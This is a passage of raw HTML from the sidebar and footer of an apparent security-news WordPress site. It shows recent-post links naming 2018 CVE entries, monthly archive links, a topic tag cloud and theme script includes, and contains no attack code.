role="complementary"> <aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="https://hackertor.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search …" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside> <aside id="recent-posts-2" class="widget widget_recent_entries"> <h4 class="widget-title">Recent Posts</h4> <ul> <li> <a href="https://hackertor.com/2018/04/25/na-cve-2018-10310-a-persistent-cross-site-scripting-vulnerability/">NA – CVE-2018-10310 – A persistent cross-site scripting vulnerability…</a> </li> <li> <a href="https://hackertor.com/2018/04/25/na-cve-2018-10366-an-issue-was-discovered-in-the-users-aka/">NA – CVE-2018-10366 – An issue was discovered in the Users (aka…</a> </li> <li> <a href="https://hackertor.com/2018/04/25/na-cve-2018-10367-an-issue-was-discovered-in-wuzhi-cms-4-1-0-the/">NA – CVE-2018-10367 – An issue was discovered in WUZHI CMS 4.1.0. The…</a> </li> <li> <a href="https://hackertor.com/2018/04/25/na-cve-2018-10372-process_cu_tu_index-in-dwarf-c-in-gnu-binutils/">NA – CVE-2018-10372 – process_cu_tu_index in dwarf.c in GNU Binutils…</a> </li> <li> <a href="https://hackertor.com/2018/04/25/na-cve-2018-10368-an-issue-was-discovered-in-wuzhi-cms-4-1-0-the/">NA – CVE-2018-10368 – An issue was discovered in WUZHI CMS 4.1.0. The…</a> </li> </ul> </aside><aside id="archives-2" class="widget widget_archive"><h4 class="widget-title">Archives</h4> <ul> <li><a href='https://hackertor.com/2018/04/'>April 2018</a></li> <li><a href='https://hackertor.com/2018/03/'>March 2018</a></li> <li><a href='https://hackertor.com/2018/02/'>February 2018</a></li> <li><a href='https://hackertor.com/2018/01/'>January 2018</a></li> <li><a href='https://hackertor.com/2017/12/'>December 2017</a></li> <li><a href='https://hackertor.com/2017/11/'>November 2017</a></li> <li><a href='https://hackertor.com/2017/10/'>October 2017</a></li> <li><a href='https://hackertor.com/2017/09/'>September 2017</a></li> <li><a href='https://hackertor.com/2017/08/'>August 2017</a></li> <li><a href='https://hackertor.com/2017/07/'>July 2017</a></li> <li><a href='https://hackertor.com/2017/06/'>June 2017</a></li> <li><a href='https://hackertor.com/2017/05/'>May 2017</a></li> <li><a href='https://hackertor.com/2017/04/'>April 2017</a></li> <li><a href='https://hackertor.com/2017/03/'>March 2017</a></li> <li><a href='https://hackertor.com/2017/02/'>February 2017</a></li> <li><a href='https://hackertor.com/2017/01/'>January 2017</a></li> <li><a href='https://hackertor.com/2016/12/'>December 2016</a></li> </ul> </aside><aside id="tag_cloud-2" class="widget widget_tag_cloud"><h4 class="widget-title">Tags</h4><div class="tagcloud"><a href="https://hackertor.com/tag/android/" class="tag-cloud-link tag-link-719 tag-link-position-1" style="font-size: 11.898734177215pt;" aria-label="Android (189 items)">Android</a> <a href="https://hackertor.com/tag/cloud-security/" class="tag-cloud-link tag-link-524 tag-link-position-2" style="font-size: 8pt;" aria-label="Cloud Security (114 items)">Cloud Security</a> <a href="https://hackertor.com/tag/code-scripting/" class="tag-cloud-link tag-link-38 tag-link-position-3" style="font-size: 13.316455696203pt;" aria-label="Code Scripting (227 items)">Code Scripting</a> <a href="https://hackertor.com/tag/cryptography/" class="tag-cloud-link tag-link-231 tag-link-position-4" style="font-size: 11.367088607595pt;" aria-label="Cryptography (177 items)">Cryptography</a> <a href="https://hackertor.com/tag/dos/" class="tag-cloud-link tag-link-84 tag-link-position-5" style="font-size: 8.3544303797468pt;" aria-label="dos (120 items)">dos</a> <a href="https://hackertor.com/tag/enterprise-security-weekly/" class="tag-cloud-link tag-link-463 tag-link-position-6" style="font-size: 9.0632911392405pt;" aria-label="Enterprise Security Weekly (130 items)">Enterprise Security Weekly</a> <a href="https://hackertor.com/tag/exploits/" class="tag-cloud-link tag-link-382 tag-link-position-7" style="font-size: 8.5316455696203pt;" aria-label="Exploits (122 items)">Exploits</a> <a href="https://hackertor.com/tag/framework/" class="tag-cloud-link tag-link-159 tag-link-position-8" style="font-size: 11.367088607595pt;" aria-label="Framework (176 items)">Framework</a> <a href="https://hackertor.com/tag/google/" class="tag-cloud-link tag-link-305 tag-link-position-9" style="font-size: 10.126582278481pt;" aria-label="google (152 items)">google</a> <a href="https://hackertor.com/tag/government/" class="tag-cloud-link tag-link-73 tag-link-position-10" style="font-size: 11.721518987342pt;" aria-label="Government (185 items)">Government</a> <a href="https://hackertor.com/tag/hacking/" class="tag-cloud-link tag-link-134 tag-link-position-11" style="font-size: 12.430379746835pt;" aria-label="hacking (201 items)">hacking</a> <a href="https://hackertor.com/tag/hacks/" class="tag-cloud-link tag-link-74 tag-link-position-12" style="font-size: 15.79746835443pt;" aria-label="Hacks (317 items)">Hacks</a> <a href="https://hackertor.com/tag/interview/" class="tag-cloud-link tag-link-135 tag-link-position-13" style="font-size: 9.2405063291139pt;" aria-label="interview (134 items)">interview</a> <a href="https://hackertor.com/tag/kali-linux/" class="tag-cloud-link tag-link-21 tag-link-position-14" style="font-size: 12.430379746835pt;" aria-label="Kali Linux (202 items)">Kali Linux</a> <a href="https://hackertor.com/tag/linux/" class="tag-cloud-link tag-link-63 tag-link-position-15" style="font-size: 20.936708860759pt;" aria-label="Linux (616 items)">Linux</a> <a href="https://hackertor.com/tag/mac/" class="tag-cloud-link tag-link-64 tag-link-position-16" style="font-size: 14.025316455696pt;" aria-label="Mac (251 items)">Mac</a> <a href="https://hackertor.com/tag/malware/" class="tag-cloud-link tag-link-75 tag-link-position-17" style="font-size: 19.873417721519pt;" aria-label="Malware (536 items)">Malware</a> <a href="https://hackertor.com/tag/microsoft/" class="tag-cloud-link tag-link-221 tag-link-position-18" style="font-size: 8.5316455696203pt;" aria-label="Microsoft (123 items)">Microsoft</a> <a href="https://hackertor.com/tag/mobile-security/" class="tag-cloud-link tag-link-44 tag-link-position-19" style="font-size: 11.544303797468pt;" aria-label="Mobile Security (179 items)">Mobile Security</a> <a href="https://hackertor.com/tag/networking/" class="tag-cloud-link tag-link-214 tag-link-position-20" style="font-size: 11.367088607595pt;" aria-label="Networking (175 items)">Networking</a> <a href="https://hackertor.com/tag/news/" class="tag-cloud-link tag-link-127 tag-link-position-21" style="font-size: 11.367088607595pt;" aria-label="News (176 items)">News</a> <a href="https://hackertor.com/tag/open-source/" class="tag-cloud-link tag-link-289 tag-link-position-22" style="font-size: 10.303797468354pt;" aria-label="Open Source (155 items)">Open Source</a> <a href="https://hackertor.com/tag/other/" class="tag-cloud-link tag-link-201 tag-link-position-23" style="font-size: 10.126582278481pt;" aria-label="Other (150 items)">Other</a> <a href="https://hackertor.com/tag/pauls-security-weekly/" class="tag-cloud-link tag-link-32 tag-link-position-24" style="font-size: 10.126582278481pt;" aria-label="Paul's Security Weekly (149 items)">Paul's Security Weekly</a> <a href="https://hackertor.com/tag/paul-asadoorian/" class="tag-cloud-link tag-link-128 tag-link-position-25" style="font-size: 13.316455696203pt;" aria-label="paul asadoorian (228 items)">paul asadoorian</a> <a href="https://hackertor.com/tag/penetration-test/" class="tag-cloud-link tag-link-15 tag-link-position-26" style="font-size: 16.506329113924pt;" aria-label="Penetration Test (344 items)">Penetration Test</a> <a href="https://hackertor.com/tag/penetration-testing/" class="tag-cloud-link tag-link-48 tag-link-position-27" style="font-size: 15.79746835443pt;" aria-label="Penetration Testing (317 items)">Penetration Testing</a> <a href="https://hackertor.com/tag/powershell/" class="tag-cloud-link tag-link-512 tag-link-position-28" style="font-size: 11.367088607595pt;" aria-label="powershell (178 items)">powershell</a> <a href="https://hackertor.com/tag/privacy/" class="tag-cloud-link tag-link-89 tag-link-position-29" style="font-size: 17.215189873418pt;" aria-label="Privacy (378 items)">Privacy</a> <a href="https://hackertor.com/tag/python/" class="tag-cloud-link tag-link-291 tag-link-position-30" style="font-size: 17.037974683544pt;" aria-label="Python (372 items)">Python</a> <a href="https://hackertor.com/tag/python-script/" class="tag-cloud-link tag-link-45 tag-link-position-31" style="font-size: 9.0632911392405pt;" aria-label="Python Script (130 items)">Python Script</a> <a href="https://hackertor.com/tag/rblackhat-2/" class="tag-cloud-link tag-link-2857 tag-link-position-32" style="font-size: 20.405063291139pt;" aria-label="r/blackhat (568 items)">r/blackhat</a> <a href="https://hackertor.com/tag/ransomware/" class="tag-cloud-link tag-link-637 tag-link-position-33" style="font-size: 11.189873417722pt;" aria-label="ransomware (173 items)">ransomware</a> <a href="https://hackertor.com/tag/scan/" class="tag-cloud-link tag-link-292 tag-link-position-34" style="font-size: 8pt;" aria-label="Scan (114 items)">Scan</a> <a href="https://hackertor.com/tag/scanner/" class="tag-cloud-link tag-link-67 tag-link-position-35" style="font-size: 9.7721518987342pt;" aria-label="Scanner (144 items)">Scanner</a> <a href="https://hackertor.com/tag/security/" class="tag-cloud-link tag-link-34 tag-link-position-36" style="font-size: 15.974683544304pt;" aria-label="security (325 items)">security</a> <a href="https://hackertor.com/tag/security-tools/" class="tag-cloud-link tag-link-40 tag-link-position-37" style="font-size: 9.2405063291139pt;" aria-label="Security Tools (133 items)">Security Tools</a> <a href="https://hackertor.com/tag/security-weekly/" class="tag-cloud-link tag-link-35 tag-link-position-38" style="font-size: 12.075949367089pt;" aria-label="security weekly (194 items)">security weekly</a> <a href="https://hackertor.com/tag/tools/" class="tag-cloud-link tag-link-166 tag-link-position-39" style="font-size: 8.7088607594937pt;" aria-label="Tools (124 items)">Tools</a> <a href="https://hackertor.com/tag/uncategorized/" class="tag-cloud-link tag-link-51 tag-link-position-40" style="font-size: 15.79746835443pt;" aria-label="Uncategorized (315 items)">Uncategorized</a> <a href="https://hackertor.com/tag/vulnerabilities/" class="tag-cloud-link tag-link-76 tag-link-position-41" style="font-size: 22pt;" aria-label="Vulnerabilities (703 items)">Vulnerabilities</a> <a href="https://hackertor.com/tag/vulnerability-scanner/" class="tag-cloud-link tag-link-444 tag-link-position-42" style="font-size: 8.8860759493671pt;" aria-label="Vulnerability Scanner (127 items)">Vulnerability Scanner</a> <a href="https://hackertor.com/tag/webapps/" class="tag-cloud-link tag-link-14 tag-link-position-43" style="font-size: 17.569620253165pt;" aria-label="webapps (396 items)">webapps</a> <a href="https://hackertor.com/tag/web-security/" class="tag-cloud-link tag-link-90 tag-link-position-44" style="font-size: 17.746835443038pt;" aria-label="Web Security (409 items)">Web Security</a> <a href="https://hackertor.com/tag/windows/" class="tag-cloud-link tag-link-71 tag-link-position-45" style="font-size: 17.392405063291pt;" aria-label="Windows (387 items)">Windows</a></div> </aside></div><!-- #secondary --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="scroll-container"> <a href="#" class="scrolltop"><i class="fa fa-chevron-up"></i></a> </div> <div class="site-info container"> <a href="http://wordpress.org/" rel="nofollow">Proudly powered by WordPress</a><span class="sep"> | </span>Theme: <a href="http://themeisle.com/themes/amadeus/" rel="nofollow">Amadeus</a> by Themeisle. </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <script type='text/javascript' src='https://hackertor.com/wp-content/themes/amadeus/js/navigation.js?ver=20120206'></script> <script type='text/javascript' src='https://hackertor.com/wp-content/themes/amadeus/js/skip-link-focus-fix.js?ver=20130115'></script> <script type='text/javascript' src='https://hackertor.com/wp-includes/js/wp-embed.min.js?ver=dd9f6eb2c2c82435543ec30064218d85'></script> </body> </html>